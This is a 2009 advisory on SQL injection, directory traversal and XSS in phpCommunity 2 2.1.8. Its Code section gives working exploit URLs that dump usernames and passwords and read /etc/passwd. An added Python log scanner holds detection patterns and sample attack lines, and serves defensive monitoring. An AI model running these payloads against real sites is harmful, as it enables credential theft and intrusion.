
phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)




*******   Salvatore "drosophila" Fresta   *******

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/ 

[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com 


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


This web application contains several vulnerabilities
that can be exploited to obtain restricted information.
The following are examples of the vulnerabilities
discovered in this application.


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
                   module/forum/class_search.php

This bug allows a guest to view the username and
password of a registered user.


- [B] Directory Traversal

[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
                   module/admin/files/show_source.php

This bug allows a guest to read arbitrary files and
directories on the web server.


- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' 
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' 
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" 
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" 
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23

http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" 
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23


- [B] Directory Traversal

http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd 

http://www.site.com/path/module/admin/files/show_source.php?path=/etc 


- [C] Reflected XSS

http://www.site.com/path/templates/1/login.php?msg= 


*************************************************

[+] Fix

No fix.
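
With no fix available, requests shaped like those in the Code section can at least be flagged in web server access logs. The following Python is an added example, not part of the original advisory or of phpCommunity 2: the script paths and parameter names are taken from the advisory, while the matching rules, function names and sample log lines are assumptions constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths and parameter names are the advisory's; the rules, function
# names and log lines are constructed for this example.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"union\s+(?:all\s+)?select", re.I)
FILE_SCRIPTS = {"module/admin/files/show_file.php": "file",
                "module/admin/files/show_source.php": "path"}

def fully_decode(value, rounds=3):  # undo repeated percent-encoding
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):  # advisory bug labels (A, B, C) matched by a request target
    parts, hits = urlsplit(target), set()
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw)
        if name in ("forum_id", "topic_id") and not re.fullmatch(r"\d*", value):
            hits.add("A")  # assumption: ids are plain non-negative integers
        if name == "wert" and UNION_RE.search(value):
            hits.add("A")  # search term carrying a UNION SELECT
        for script, param in FILE_SCRIPTS.items():
            if parts.path.endswith(script) and name == param:
                if ".." in value or value.startswith("/"):
                    hits.add("B")  # parent-directory or absolute path
        if name == "msg" and parts.path.endswith("templates/1/login.php") and "<" in value:
            hits.add("C")  # markup passed through msg
    return hits

def scan(lines):  # (client, sorted labels) for each log line matching a rule
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        labels = classify(m.group(2)) if m else set()
        if labels:
            findings.append((m.group(1), sorted(labels)))
    return findings

SAMPLE_LOG = [  # constructed lines; client addresses are documentation ranges
    '192.0.2.10 - - [07/Mar/2009:10:00:01 +0000] "GET /path/index.php?n=guest&c=0&m=forum&s=1&forum_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Mar/2009:10:00:02 +0000] "GET /path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1%27+UNION+ALL+SELECT+1,2%23 HTTP/1.1" 200 812',
    '198.51.100.7 - - [07/Mar/2009:10:00:03 +0000] "GET /path/index.php?n=guest&c=0&m=search&s=id&wert=-1%2525%2522%2520UNION%2520ALL%2520SELECT%25201%2C2 HTTP/1.1" 200 640',
    '203.0.113.5 - - [07/Mar/2009:10:00:04 +0000] "GET /path/module/admin/files/show_file.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1443',
    '203.0.113.5 - - [07/Mar/2009:10:00:05 +0000] "GET /path/module/admin/files/show_source.php?path=/etc HTTP/1.1" 200 2210',
    '203.0.113.9 - - [07/Mar/2009:10:00:06 +0000] "GET /path/templates/1/login.php?msg=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 930',
]
```

`scan(SAMPLE_LOG)` returns one entry per suspicious line with the client address and the matching bug labels; the third sample line shows a double-encoded value still being caught after repeated decoding.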


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351
